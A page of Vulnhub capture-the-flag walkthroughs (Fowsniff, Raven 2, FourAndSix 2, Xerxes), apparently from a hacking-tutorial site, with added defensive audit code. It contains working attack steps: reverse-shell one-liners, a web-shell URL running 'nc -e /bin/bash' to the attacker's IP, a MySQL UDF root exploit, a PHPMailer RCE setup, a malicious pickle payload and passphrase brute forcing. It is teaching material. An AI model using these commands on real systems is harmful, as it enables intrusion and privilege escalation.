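The throttled scanner stays under the rate rule, which is what DirBuster's requests-per-second limit buys you, but it is still caught by the 404 ratio; a rate limit alone is not a defence against a slow scan, and a throttle alone is not stealth against a defender who looks at response codes.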



We hope you enjoy using this tool. It is a great tool that’s a must in a pentesters arsenal.
Stay tuned for more articles on the latest and greatest in hacking.


Fowsniff: 1 Vulnhub Walkthrough

$
0
0

Fowsniff: 1 Vulnhub Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as Fowsniff. The credit for making this vm machine goes to “berzerk0” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.
Security Level: Beginner
Flags: There is one flag (flag.txt).
Table of contents:
·         Port scanning and IP discovery.
·         Hitting on port 80
·         Finding hashes on Pastebin
·         Decoding hashes
·         Brute force pop3 login
·         Connecting to pop3
·         Finding SSH username and password
·         Finding privilege escalation vectors
·         Exploiting Misconfiguration in system
·         Getting root access.
·         Reading the flags.
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
We found our target –> 192.168.1.29
Our next step is to scan our target with nmap.
nmap -A -p- -T4 192.168.1.29
The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 110(POP3), 143(IMAP)
We find that port 80 is running http, so we open the IP in our browser.
We don’t find anything on the webpage, and a dirb scan and nikto also didn’t reveal anything, so we googled “fowsniff corp” and found a pastebin link that contained usernames and password hashes. (You can find the link here)
We cracked the hashes using this site and found the passwords for the respective e-mail addresses. Only 8 of the 9 hashes cracked.
So we create two wordlists one for username and one for passwords, we will use this to brute force pop3 login.
We use the Metasploit framework to brute force the POP3 login with those two lists. After running it we find the correct credentials to be “seina:scoobydoo2”.
msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run

We connect to the POP3 service on the target and log in with the credentials we retrieved. After logging in we list the messages and find there are 2.
nc 192.168.1.29 110
user seina
pass scoobydoo2
list
We retrieve the 1st message and find that it contains the password to connect through SSH.
retr 1
We retrieve the second message; it hints that the username to use is “baksteen”.
retr 2
We use the credentials “baksteen:S1ck3nBluff+secureshell” to login through SSH.
ssh baksteen@192.168.1.29
After gaining access we enumerate the system. As user “baksteen” belongs to two groups, we search for files owned by the “users” group and find a file called “cube.sh”.
find / -group users -type f 2>/dev/null
We take a look at the content of the file and find that it contains the banner printed when we log in through SSH.
cd /opt/cube
cat cube.sh
We open the file with vim and add a python reverse-shell one-liner. The address in connect() must be the attacking machine where the netcat listener will run; the one-liner as written uses 192.168.1.29, which in this lab is the target’s own IP, so substitute your Kali machine’s address.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We try to run it and get the error “python: command not found”. We look for python and find that only python3 is installed.
So we change the one-liner to use python3 instead of python.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The SSH login banner matches what “cube.sh” prints, so we check the “/etc/update-motd.d/” directory, whose scripts are run as root by pam_motd on every login, and find that “00-header” executes this shell script. Because cube.sh is writable by the users group, anything we put in it runs as root at the next login.
So we exit the SSH session, set up our netcat listener on the attacking machine, and connect through SSH again so that our reverse shell gets executed.
ssh baksteen@192.168.1.29
As soon as we log in, we get a reverse shell as root on the netcat listener. We go to /root, find the file “flag.txt”, and read the congratulatory message.
nc -lvp 1234
id
cd /root
cat flag.txt
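The weakness used above is a writable file executed by a root-run MOTD script. As an added example (not from the walkthrough), the following Python audits a MOTD directory for exactly that: it reads each script, extracts the absolute paths it references, and reports those that exist and carry a group- or world-write bit. build_fixture() creates a constructed stand-in for /etc/update-motd.d and /opt/cube in a temporary directory, so the check runs anywhere; point audit_motd_dir() at the real /etc/update-motd.d to audit a live host.

```python
# Added example (not from the article): an audit for the weakness Fowsniff is rooted through.
# pam_motd runs every script in /etc/update-motd.d as root at each login, so whatever those
# scripts execute must not be writable by an ordinary user or group. The checker reads each
# MOTD script, extracts the absolute paths it references and reports those that exist and carry
# a group- or world-write bit; harden() removes those bits. build_fixture() creates a constructed
# stand-in for /etc/update-motd.d and /opt/cube in a temporary directory, so it runs anywhere.
import os
import re
import stat
import tempfile

# An absolute path with at least two components, not glued to a preceding word or slash
PATH_RE = re.compile(r"(?<![\w./-])(/[\w.-]+(?:/[\w.-]+)+)")


def referenced_paths(script_text):
    """Absolute paths mentioned in a script (catches 'sh /opt/cube/cube.sh' style lines)."""
    return sorted(set(PATH_RE.findall(script_text)))


def is_writable_by_others(path):
    """True when the group- or world-write bit is set on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def _mode(path):
    return oct(stat.S_IMODE(os.stat(path).st_mode))


def audit_motd_dir(motd_dir):
    """Return [(motd_script, writable_file, mode)] for every file an unprivileged user could edit."""
    findings = []
    for name in sorted(os.listdir(motd_dir)):
        script = os.path.join(motd_dir, name)
        if not os.path.isfile(script):
            continue
        if is_writable_by_others(script):            # the MOTD script itself
            findings.append((script, script, _mode(script)))
        with open(script, errors="replace") as fh:
            text = fh.read()
        for dep in referenced_paths(text):
            if os.path.isfile(dep) and is_writable_by_others(dep):
                findings.append((script, dep, _mode(dep)))
    return findings


def harden(path):
    """Clear the group/world write bits (chmod g-w,o-w) and return the new mode."""
    os.chmod(path, stat.S_IMODE(os.stat(path).st_mode) & ~(stat.S_IWGRP | stat.S_IWOTH))
    return _mode(path)


def build_fixture():
    """Constructed lab tree: 00-header runs a group-writable cube.sh, like the Fowsniff box."""
    root = tempfile.mkdtemp(prefix="motd_audit_")
    motd_dir = os.path.join(root, "update-motd.d")
    cube_dir = os.path.join(root, "opt", "cube")
    os.makedirs(motd_dir)
    os.makedirs(cube_dir)
    banner = os.path.join(cube_dir, "cube.sh")
    static = os.path.join(cube_dir, "static.sh")
    header = os.path.join(motd_dir, "00-header")
    with open(banner, "w") as fh:
        fh.write("#!/bin/sh\nprintf 'Welcome to Fowsniff\\n'\n")
    os.chmod(banner, 0o664)          # group 'users' can edit it: the bug
    with open(static, "w") as fh:
        fh.write("#!/bin/sh\nuname -r\n")
    os.chmod(static, 0o644)          # not writable by group or others: fine
    with open(header, "w") as fh:
        fh.write(f"#!/bin/sh\n# runs as root via pam_motd\nsh {banner}\nsh {static}\n")
    os.chmod(header, 0o755)
    return motd_dir, banner


if __name__ == "__main__":
    motd_dir, banner = build_fixture()
    for script, dep, mode in audit_motd_dir(motd_dir):
        print(f"{script}: executes {dep} with mode {mode}")
```

The regex is deliberately simple and will miss paths built from variables or relative to a cd; treat a clean result as "nothing obvious", not as proof, and also check that every referenced file is owned by root, which this example does not do.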

Raven 2: Vulnhub Walkthrough


Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2, the sequel to the previously solved Raven. Raven 2 is a beginner/intermediate boot2root machine; the goal is to snag 4 flags and get root on the target VM.
Table of contents:
1.      Port scanning and IP discovery.
2.      Hitting on port 80 and discovery of WordPress CMS.
3.      Directory enumeration to find a directory “vendor.”
4.      Discovering a file PATH to snag flag 1.
5.      Discovering a file VERSION to snag the PHP version.
6.      Exploiting RCE in PHPMailer version 5.2.6
7.      Making local changes in the exploit code for successful delivery of payload.
8.      Getting a netcat shell using the uploaded payload.
9.      Snagging flag 2 in /var/www
10.  Reading database password from wp-config file.
11.  Running LinEnum.sh to enumerate processes.
12.  Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db
13.  Setting the setuid bit on find.
14.  Getting root access.
15.  Snagging flag4 in /root
16.  Manually traversing system to find flag3.
Let’s get started then!
We discover the active devices on the network using netdiscover to get the IP address of our victim machine; in this case it is 192.168.1.101.

Using nmap on the victim machine we found three open ports: 22, 80 and 111.

So we instantly moved to the port 80 and discovered a website of Raven Security.
We thought it wise to run a directory test before scanning anything else, so we ran a directory brute-force and found a “vendor” directory on the victim machine.
Accessing /vendor the following files and folders came out.

Among them a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!
There was yet another file worth noting called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6 but look at the previous screen again… A file exists called: PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 was of PHPMailer. So, on a bit of internet surfing we found an RCE exploit for the version!
We downloaded this Python exploit, but don’t run it yet! A few changes have to be made first; they are highlighted in the screen below.
1.      Add a coding: utf-8 tag at the top of the script.
2.      Set the target to http://192.168.1.101/contact.php, the contact form that hands its input to the vulnerable PHPMailer library.
3.      Set the backdoor’s file name. Let it be backdoor.php for now.
4.      Set your own IP address in the subprocess call: the PHP backdoor the script writes connects back to it.
5.      And finally, the directory on the target where the backdoor is to be written (the web root).
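Why does a mail address turn into extra sendmail switches? The following Python model is an added example written for this page, not code from the original post or from PHPMailer. It reproduces the ingredients of the bug: PHPMailer 5.2.x ran the sender through PHP’s escapeshellcmd() and glued it onto -f, and PHP’s mail() then hands the whole string to /bin/sh, whose word splitting turns one address into several arguments (shlex.split does the same POSIX splitting here). The sender string, sendmail path and backdoor path are constructed for the demonstration.

```python
import re
import shlex

# Characters that PHP's escapeshellcmd() prefixes with a backslash (quotes are handled
# separately, by pairing). Taken from the PHP manual's description of the function.
PHP_SPECIALS = set("#&;`|*?~<>^()[]{}$\\\n\xff")

# Constructed sender value, shaped like the public PHPMailer exploit. A quoted local part is
# legal address syntax, so an RFC-style validator (PHP's FILTER_VALIDATE_EMAIL) accepts it.
EVIL_FROM = '"attacker\\" -oQ/tmp/ -X/var/www/html/backdoor.php  some"@example.com'


def php_escapeshellcmd(s: str) -> str:
    """Model of PHP's escapeshellcmd(): metacharacters get a backslash, but a quote is only
    escaped when it has no later partner, so paired quotes pass through untouched."""
    out = []
    partner = None                      # index of the quote that will close the open one
    for i, ch in enumerate(s):
        if ch in ('"', "'"):
            if partner is None:
                nxt = s.find(ch, i + 1)
                if nxt == -1:
                    out.append("\\")    # lone quote: escaped
                else:
                    partner = nxt       # opening quote: left as-is
            elif partner == i:
                partner = None          # the closing quote: left as-is
            else:
                out.append("\\")        # a different quote inside a pair: escaped
            out.append(ch)
        elif ch in PHP_SPECIALS:
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def vulnerable_sendmail_argv(sender: str) -> list:
    """What PHPMailer < 5.2.18 effectively did: escape the sender, append it to -f and hand
    the line to PHP's mail(), which runs sendmail via popen(), i.e. through /bin/sh -c.
    shlex.split() performs the same POSIX word splitting the shell would."""
    command = f"/usr/sbin/sendmail -t -i -f{php_escapeshellcmd(sender)}"
    return shlex.split(command)


def hardened_sendmail_argv(sender: str) -> list:
    """Hardened form: allow only a narrow address alphabet (no quotes, spaces or backslashes)
    and build argv as a list so no shell ever parses the value."""
    if not re.fullmatch(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", sender):
        raise ValueError("sender address rejected")
    return ["/usr/sbin/sendmail", "-t", "-i", f"-f{sender}"]


def injected_options(argv: list) -> list:
    """Arguments after the -f<sender> slot that sendmail would parse as options."""
    return [arg for arg in argv[4:] if arg.startswith("-")]


if __name__ == "__main__":
    argv = vulnerable_sendmail_argv(EVIL_FROM)
    print("shell would run:", argv)
    print("injected options:", injected_options(argv))
```

Run it and the vulnerable variant yields seven argv entries instead of four, with -X (sendmail’s log-file option) pointing at a path under the web root, which is exactly how the exploit gets its PHP written to disk; the hardened variant rejects the address outright, which is essentially what PHPMailer 5.2.18 did.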
Now run the Python script and wait for the success message.
Start a netcat listener on port 443: the backdoor connects back to port 443, as written in the script’s subprocess call.
Opening the backdoor’s URL in the browser immediately gave us a shell!
We then spawned a proper TTY with the usual Python one-liner and browsed to /var/www, where flag2 was waiting.
python -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt
Next we checked the WordPress directory, as we did in the prequel Raven 1.
cd /var/www/html/wordpress
cat wp-config.php
wp-config.php gave us the database credentials: user root with password R@v3nSecurity.
We then moved to /tmp and pulled in LinEnum.sh, a script that enumerates a wide range of basic and advanced Linux details.
It was served from a folder on our local machine and fetched on the victim with wget.
My local IP address was 192.168.1.109 in this case.
cd /tmp
chmod +x LinEnum.sh
./LinEnum.sh
LinEnum flagged the MySQL service and pointed us to the MySQL-Exploit-Remote-Root-Code-Execution-Privesc advisory (for more info: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html). The detail that matters for us is the precondition that advisory builds on: mysqld here runs as root. Combined with the root database password from wp-config.php, that makes the classic user-defined function (UDF) trick available: any shared library we can get MySQL to load executes as root.

So we searched for a UDF dynamic library exploit and found it in Exploit Database as 1518.c (the raptor_udf2 exploit).
It works by compiling the C source into a shared object, transferring that .so to the victim and loading it through MySQL.
The first step is to compile it:
searchsploit -m 1518
gcc -g -shared -fPIC -Wl,-soname,1518.so -o 1518.so 1518.c -lc
Then we transferred the resulting .so file into the /tmp directory on the victim’s machine.
wget http://192.168.1.109/1518.so
chmod 777 1518.so
Now we log in to the MySQL interface with the credentials from wp-config.php.
mysql -u root -p
With a MySQL shell, we start the UDF attack.
use mysql;
First we create a table called foo with a single blob column.
Into it we insert the raw bytes of the 1518.so we just fetched into /tmp, using load_file() (this needs the FILE privilege, which root has, and an unrestricted secure_file_priv).
We then write the blob back out to /usr/lib/mysql/plugin/1518.so with select ... into dumpfile, which writes the bytes verbatim; the plugin directory is writable because mysqld runs as root.
In the most important step, we create a UDF named do_system backed by that library, so calling the function runs the code from 1518.c.
Finally we call it with chmod u+s /usr/bin/find, which sets the SUID bit on find; the command runs with mysqld’s root privileges.
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');

Back in /tmp, we use the now SUID find to run commands: -exec runs the given program for every matched file, and because find is SUID root the child inherits root’s effective UID. We ask for /bin/sh rather than bash, because bash drops an elevated effective UID unless started with -p.
touch raj
find raj -exec whoami \;
find raj -exec /bin/sh \;
cd /root
ls
cat flag4.txt


The only flag left was flag3. The find utility would locate it, but a bit of luck let us find it manually: it was lying in /var/www/html/wp-content/uploads/2018/11.
We copied it into /var/www/html with cp.
Since it is a PNG image, we viewed it in the browser.
And that is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

FourAndSix: 2 Vulnhub Walkthrough


FourAndSix: 2 is the sequel to the previously solved FourAndSix machine by Fred, uploaded on Vulnhub. It is not mandatory, but it is advisable to read the prequel of this lab here. You can download the FourAndSix:2 vulnerable lab from here. The challenge is to become root and read flag.txt in root’s directory.

Table of contents:
·         Discovery of IP address.
·         Scanning for open ports and services.
·         Discovering universally accessible directory in victim’s machine.
·         Cracking the password of archive found in storage partition.
·         Reading the pub file and logging in using ssh.
·         Discovering utilities with sticky bit on them.
·         Using doas to get root.
·         Snagging the flag!
Let’s get started then.

The first step, as usual, is to find the IP of the target machine. In this case it is 192.168.1.103.


Next we discover open ports and services with nmap. The open ports were 22 (SSH), 111 (rpcbind) and 2049 (NFS).

The only promising way in is port 2049, so we used showmount to list the NFS exports.
We then mounted the exported share on a local directory named “raj” (created beforehand) with the mount command, and found a 7z archive inside.
showmount -e 192.168.1.103
mount -t nfs 192.168.1.103:/home/user/storage raj

But the file “backup.7z” was unfortunately password protected.


After trying several options such as John the Ripper without success, we found an online service that broke its password.
The password turned out to be: chocolate

We extracted its contents in the same folder and found a few images along with an RSA key pair. Since port 22 runs SSH on the target, the private key should get us in. We opened the public key to read the username from its comment field.
cat id_rsa.pub


We tried logging in over SSH with the key, but it asked for a passphrase. So we wrote a small loop that feeds a wordlist to ssh-keygen: ssh-keygen -c rewrites the key’s comment, which it can only do after decrypting the key with the passphrase given by -P, so the first passphrase for which it succeeds is the right one (the -y option, which just prints the public key, would make the same check without rewriting the file).

while read -r pass; do
  if ssh-keygen -c -C "user@forandsix" -P "$pass" -f id_rsa >/dev/null 2>&1; then
    echo "$pass"; break
  fi
done < /usr/share/wordlists/metasploit/adobe_top100_pass.txt


The passphrase was 12345678, and the username in the id_rsa.pub comment was user, so we logged in with the key.
ssh -i id_rsa user@192.168.1.103
We used find to list files with the SUID bit set.
find / -perm -u=s -type f 2>/dev/null
Among them was an interesting one: /usr/bin/doas, OpenBSD’s alternative to sudo.
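The SUID sweep above, and the same one in the Raven 2 walkthrough earlier on this page, is the moment to triage rather than just list. Below is an added Python example (my own, not code from either VM or the original posts) that walks a tree like find -perm -4000, skipping what it cannot read, and tags each hit against a GTFOBins-style list of programs known to hand over a shell when SUID. The candidate list is an assumption for illustration, and demo_tree() builds a throwaway fixture so the walker can be exercised without touching the real system.

```python
import os
import stat
import sys
import tempfile
from typing import Iterator, List, Tuple

# Programs GTFOBins documents as giving a shell (or arbitrary file access) when they run with
# elevated privileges; find (Raven 2) and doas/less (FourAndSix 2) are among them. Assumption
# for illustration: extend it to taste.
ESCAPE_CANDIDATES = {
    "find", "vim", "vi", "less", "more", "nmap", "awk", "gawk", "python", "python3",
    "perl", "ruby", "env", "nano", "cp", "mv", "tar", "bash", "sh", "doas", "sudo",
}


def find_setuid(root: str) -> Iterator[Tuple[str, int]]:
    """Equivalent of `find ROOT -type f \\( -perm -4000 -o -perm -2000 \\) 2>/dev/null`:
    yield (path, mode) for regular files carrying SUID or SGID, without following symlinks
    and without dying on directories we are not allowed to read."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode


def triage(entries: Iterator[Tuple[str, int]]) -> List[Tuple[str, str, str]]:
    """Attach a verdict to each hit: 'escape' for a known shell-escape binary, 'review' for
    everything else. Output rows are (path, symbolic mode, verdict)."""
    rows = []
    for path, mode in entries:
        verdict = "escape" if os.path.basename(path) in ESCAPE_CANDIDATES else "review"
        rows.append((path, stat.filemode(mode), verdict))
    return rows


def demo_tree() -> List[Tuple[str, str, str]]:
    """Constructed fixture: a throwaway tree holding a SUID find, a SUID doas and a plain ls,
    so the walker can be exercised without touching the real system. Returns rows with the
    basename instead of the random temp path."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {"bin/find": 0o4755, "bin/doas": 0o4755, "bin/ls": 0o755}
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, mode)
    rows = triage(find_setuid(root))
    return sorted((os.path.basename(p), m, v) for p, m, v in rows)


if __name__ == "__main__":
    for row in triage(find_setuid(sys.argv[1] if len(sys.argv) > 1 else "/usr")):
        print(*row, sep="\t")
```

Point it at / on a target and read the “escape” rows first; “review” rows still deserve a look, since a custom SUID binary (like /opt/notes in the Xerxes walkthrough below) is often the intended path.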

After reading the “doas.conf” file, we find that “less” can be run as root.


Let’s pick the configuration file apart word by word. doas executes commands as other users according to the rules in doas.conf; when several rules match, the last one wins.
permit / deny: whether the rule allows or refuses the action.
nopass: the user is not asked for a password.
persist: after the user has authenticated once, do not ask for a password again for a while.
keepenv: the user’s environment variables are kept rather than reset.
cmd: the command (optionally with args) the rule applies to; without it, any command matches.

Since the configuration lets user run less as root with no password at all, and less can hand us an editor and from there a shell, that is our way out of the restricted account.
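Reading doas.conf by hand works for one file; on an engagement you want to parse it. The following Python is an added example (mine, not code from the VM or from OpenBSD), parsing the rule grammar described above (permit|deny [options] identity [as target] [cmd command [args ...]]) and listing every permit that runs as root either unrestricted or through a program with a known shell escape. The sample configuration is constructed to mirror the rule found on the box and is not the VM’s real file; the escapable-program list is an assumption.

```python
from dataclasses import dataclass, field
from typing import List

# Programs that give the caller a shell once they run as root (less's `v` into vi, `:!sh`, ...).
# Assumed list for illustration; GTFOBins is the reference to extend it from.
ESCAPABLE = {"less", "more", "vi", "vim", "view", "man", "awk", "find", "python", "perl",
             "sh", "ksh", "bash", "env"}
OPTION_WORDS = {"nopass", "nolog", "persist", "keepenv"}


@dataclass
class Rule:
    action: str                      # permit or deny
    options: List[str]               # nopass, persist, keepenv, nolog, setenv { ... }
    identity: str                    # user name or :group
    target: str = "root"             # 'as target' is optional; doas defaults to root
    cmd: str = ""                    # empty: any command
    args: List[str] = field(default_factory=list)


def parse_doas_conf(text: str) -> List[Rule]:
    """Parse doas.conf rules: permit|deny [options] identity [as target] [cmd command [args ...]]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        action = tokens.pop(0)
        if action not in ("permit", "deny"):
            raise ValueError(f"bad rule: {raw!r}")
        options = []
        while tokens and (tokens[0] in OPTION_WORDS or tokens[0] == "setenv"):
            opt = tokens.pop(0)
            if opt == "setenv":                      # setenv { VAR=value ... } spans tokens
                while tokens:
                    piece = tokens.pop(0)
                    opt += " " + piece
                    if piece.endswith("}"):
                        break
            options.append(opt)
        identity = tokens.pop(0)
        target = "root"
        if tokens and tokens[0] == "as":
            tokens.pop(0)
            target = tokens.pop(0)
        cmd, args = "", []
        if tokens and tokens[0] == "cmd":
            tokens.pop(0)
            cmd = tokens.pop(0)
            if tokens and tokens[0] == "args":
                args = tokens[1:]
        rules.append(Rule(action, options, identity, target, cmd, args))
    return rules


def risky_rules(rules: List[Rule]) -> List[Rule]:
    """doas applies the last matching rule, so this is a triage list, not a final verdict:
    every permit that runs as root either unrestricted or via a shell-escapable program."""
    hits = []
    for r in rules:
        if r.action != "permit" or r.target != "root":
            continue
        if r.cmd == "" or r.cmd.rsplit("/", 1)[-1] in ESCAPABLE:
            hits.append(r)
    return hits


# Constructed sample, modelled on the rule the walkthrough describes; not the VM's real file.
SAMPLE_CONF = """\
# /etc/doas.conf
permit persist :wheel
permit nopass keepenv user as root cmd /usr/bin/less
permit nopass user cmd /usr/bin/openssl args x509 -noout -text
deny user cmd /bin/sh
"""

if __name__ == "__main__":
    for rule in risky_rules(parse_doas_conf(SAMPLE_CONF)):
        print(rule)
```

The less rule is reported with nopass in its options, which is the combination worth acting on; the :wheel rule is reported too, since an unrestricted permit is only as safe as the membership of that group.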

doas /usr/bin/less /var/log/authlog


Inside less, press v to open the file in the editor (vi here); from vi, type :!sh to spawn a shell, which keeps the root privileges doas gave us.


The final step was to snag the flag, which the VM’s creator told us lives in root’s directory.
id confirms the shell is running as root, and we read the congratulatory flag with cat!

So this is how we rooted FourAndSix: 2. Hope you liked it.

Xerxes: 1 Vulnhub Walkthrough


Welcome to another boot2root CTF challenge, “Xerxes: 1”, uploaded by bas on Vulnhub. The box has a theme, and you need to snag the flag to complete it. You can download it from the link below:
 https://download.vulnhub.com/xerxes/xerxes.tar.gz
According to the author, it takes a good variety of techniques to get root, with no exploit development or buffer overflows involved. We made our way through it on the basis of our experience and knowledge.
Level: Beginner
Penetrating Methodologies:
  • Network scanning (Nmap)
  • Surfing HTTP web services
  • Directory bruteforcing (Dirb)
  • Base64 decoding
  • Gimp Editor to zoom image and find the hint
  • Decimal to ASCII, Brainfuck decoding
  • Search and Capture the flag at various stages
Walkthrough

First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.102.

Now we scan the discovered IP to see the available ports.
nmap -A 192.168.1.102
The scan shows port 80 open with an HTTP service, so we navigate to it in the browser.

The home page gave no remarkable clue, so without wasting time we ran dirb for web directory enumeration:
dirb http://192.168.1.102
The scan found another directory, /dev, so let’s browse it.
It holds a “forgot password” link, which we follow to see if there is something useful.
To our surprise it is a QR code. Scanning it yields a base64-encoded text.
Decoding the base64 string gives the next hint.
The clue said “look deeper”, so we zoomed into the image and noticed a few odd pixels in the top-left corner. To read them we used GIMP: we opened the image via Open as Layers in the File menu, deselected everything except the alpha channel, and used the Color Picker tool from the Tools menu to read the alpha value of each of those pixels.
After collecting all the alpha values, we convert the decimal values to their ASCII characters.
The resulting characters form a base64 string, so we decode that next.
The decoded base64 is a Brainfuck program (a programming language, not an encryption): running it through a Brainfuck interpreter prints the hidden text.
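Rather than pasting the program into a website, you can run it yourself. Below is an added Python example (my own, not code from the Xerxes VM or the original post) with a small Brainfuck interpreter plus the full decoding chain used here: decimal alpha values to ASCII, base64-decode, run the program. The sample program and the decimal list are constructed for the demonstration; substitute the values you pulled from the image.

```python
import base64
from typing import Iterable, List


def run_brainfuck(program: str, stdin: bytes = b"", max_steps: int = 5_000_000) -> str:
    """Execute a Brainfuck program and return its output. Non-command characters are
    ignored, cells are 8-bit and wrap, the tape has 30,000 cells, and a step limit stops
    a malicious or broken program from spinning forever."""
    code = [ch for ch in program if ch in "+-<>[].,"]
    jumps, stack = {}, []
    for i, ch in enumerate(code):            # precompute matching brackets
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']'")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '['")

    tape, ptr, pc, out = bytearray(30000), 0, 0, bytearray()
    inp = iter(stdin)
    for _ in range(max_steps):
        if pc >= len(code):
            return out.decode("latin-1")
        ch = code[pc]
        if ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)          # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer out of range")
        pc += 1
    raise RuntimeError("step limit exceeded")


def decimals_to_text(values: Iterable[int]) -> str:
    """The 'decimal to ASCII' step: a list of byte values back into a string."""
    return bytes(values).decode("latin-1")


def decode_chain(values: Iterable[int]) -> str:
    """The full chain from the walkthrough: decimals -> ASCII (a base64 string) ->
    base64-decode -> a Brainfuck program -> run it -> the hidden text."""
    program = base64.b64decode(decimals_to_text(values)).decode("latin-1")
    return run_brainfuck(program)


# Constructed Brainfuck program that prints "Hi" (72 = 8*9, 105 = 7*15).
SAMPLE_PROGRAM = "++++++++[>+++++++++<-]>.<+++++++[>>+++++++++++++++<<-]>>."


def sample_decimals() -> List[int]:
    """Wrap SAMPLE_PROGRAM the way the challenge did: base64 it, then list the byte values."""
    return list(base64.b64encode(SAMPLE_PROGRAM.encode()))


if __name__ == "__main__":
    print(decode_chain(sample_decimals()))
```

The step limit matters when the program comes from a CTF or from an attacker: an unbounded interpreter is an easy denial of service, and a bounds check on the tape pointer keeps a stray < from wrapping around to the end of the array.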
This value is the password for the upload form. Uploading a .php web shell was refused, so we uploaded it with a .pht extension, which Apache’s PHP handler still treats as PHP.
Then we open the uploaded shell by URL and pass ls through its cmd parameter to confirm we have command execution.
Since commands execute, we can get a reverse shell from the victim with:
http://192.168.1.102/dev/upload/shell.pht?cmd=nc -e /bin/bash 192.168.1.109 1234
On the other hand, keep the netcat listener active on the kali terminal,
nc -lvp 1234
As soon as we get the reverse connection, the first thing we do is upgrade it to a more interactive session with the Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'
Now let’s look at /home to see which users exist.
cd /home
ls
There are three users: amanpour, curtiz and delacroix. We start with amanpour.
cd amanpour
ls -la
There is a .bash_history file; let’s read it.
cat .bash_history
The history shows a Python command that generated a new password; running the same command again prints that password.
python steqr.py -f newpassword
Now that we have amanpour’s password, we switch to that user with it.
Next we search for files with the SUID bit set.
find / -perm -4000 -type f 2>/dev/null
This turns up /opt/notes. In /opt, next to the notes binary, there is a notes.py, so we read it.
cd /opt
ls
cat notes.py
notes.py shows that the file to load is resolved relative to /home/curtiz: anything elsewhere has to be reached with a ../../ prefix followed by the full path from /.
It also shows that the script loads the file with the pickle module. pickle is not a safe format for untrusted input: the stream can name any importable callable and have it called during loading, so whoever controls the file gets code execution. We therefore wrote a file that makes the unpickler call os.system('/bin/sh'):
cat > /tmp/shell
cos
system
(S'/bin/sh'
tR.
Reading the stream opcode by opcode: c (GLOBAL) pushes os.system, ( marks the start of a tuple, S pushes the string '/bin/sh', t turns it into the argument tuple, R (REDUCE) calls os.system with it, and . ends the pickle.
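To see exactly what that stream does, here is an added Python example (not code from notes.py or the original post). It disassembles a protocol-0 stream with pickletools, runs the same GLOBAL/REDUCE construction with a harmless target (os.getcwd instead of os.system('/bin/sh')) to prove the call happens during loading, and shows the hardened loader notes.py should have used: an Unpickler whose find_class() only permits an allow-list, which is the one hook through which a pickle can reach Python objects.

```python
import io
import os
import pickle
import pickletools
from typing import Any, List

# Hand-written protocol-0 pickle with the same shape as the payload above, but it calls
# os.getcwd() instead of os.system('/bin/sh') so the demonstration is harmless:
#   c os\ngetcwd\n  GLOBAL  push os.getcwd
#   (              MARK
#   t              TUPLE   build the (empty) argument tuple
#   R              REDUCE  call os.getcwd(*())
#   .              STOP
HARMLESS_PAYLOAD = b"cos\ngetcwd\n(tR."


def opcode_names(data: bytes) -> List[str]:
    """Disassemble a pickle stream; GLOBAL followed by REDUCE in an untrusted file is the
    signature to look for."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)]


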